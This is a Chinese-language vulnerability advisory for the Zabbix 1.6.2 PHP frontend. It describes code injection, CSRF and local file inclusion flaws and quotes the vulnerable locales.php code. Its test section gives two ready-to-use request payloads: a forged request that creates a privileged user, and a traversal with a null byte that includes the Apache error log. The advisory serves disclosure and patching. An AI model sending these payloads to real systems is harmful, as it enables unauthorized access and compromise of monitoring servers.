发布日期：2009-03-03
更新日期：2009-03-05

受影响系统：

ZABBIX SIA zabbix 1.6.2

不受影响系统：

ZABBIX SIA zabbix 1.6.3

描述：

---

BUGTRAQ  ID: 33965

zabbix是一个CS结构的分布式网络监控系统。

ZABBIX的PHP前端存在多个输入验证错误，远程攻击者可以通过提交恶意请求执行跨站请求伪造攻击、读取敏感信息或完全入侵有漏洞的系统。

1) include/validate.inc.php中没有正确的过滤对calc_exp2()函数所提交的extlang参数，这可能导致注入并执行任意PHP代码。

2) 由于没有检查用户提交请求的有效性，远程攻击者可以通过提交HTTP执行非授权操作。

3) locales.php没有正确的验证对srclang参数的输入便用于包含文件，远程攻击者可以通过目录遍历攻击和URL编码的空字节包含本地资源的任意文件。以下是有漏洞的代码段：

'srclang'=> array(T_ZBX_STR, O_OPT, NULL, NOT_EMPTY, 'isset({next})'),
[...]
else if(isset($_REQUEST['next'])){
[...]
$fileFrom = 'include/locales/'.$_REQUEST['srclang'].".inc.php";
  if(file_exists($fileFrom)){
   include($fileFrom);

<*来源：Antonio Parata （s4tan@ush.it）
  
  链接：http://secunia.com/advisories/34091/
        http://marc.info/?l=bugtraq&m=123610102009920&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/users.php?config=0&save&alias=alias&name=foo&surname=foo&user_type=3&lang=lang&theme=theme&autologout=0&url=url&refresh=0
/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%00%22

建议：

---

厂商补丁：

ZABBIX SIA
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.zabbix.org/

浏览次数：2498
严重程度：0（网友投票）